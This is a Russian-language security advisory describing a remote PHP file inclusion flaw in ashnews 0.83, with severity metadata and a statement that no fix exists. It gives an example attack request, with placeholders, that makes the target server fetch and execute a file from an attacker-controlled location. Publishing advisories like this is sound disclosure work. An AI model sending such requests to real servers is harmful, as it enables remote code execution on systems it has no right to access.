Выполнение произвольного PHP кода в ashnews

Дата публикации:
25.07.2003
Всего просмотров:
1902
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
ashnews 0.x
Описание: Уязвимость включения файла обнаружена в ashnews. Удаленный пользователь может выполнить произвольные PHP команды на целевом сервере.

Сценарии 'ashnews.php' и 'ashheadlines.php' включают файл 'ashprojects/newsconfig.php' в переменной $pathtoashnews, не проверяя правильность определения этой переменной. В результате удаленный пользователь может определить удаленное местоположение для $pathtoashnews каталога, чтобы включить произвольный файл 'ashprojects/newsconfig.php', расположенный на сервере атакующего, который будет выполнен на целевой системе с привилегиями Web сервера. Пример:

http://[target]/[ashweb dir]/ashnews.php?pathtoashnews=[remote location]

Уязвимость обнаружена в ashnews 0.83

Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Corrected AshNews Vulnderability

или введите имя

CAPTCHA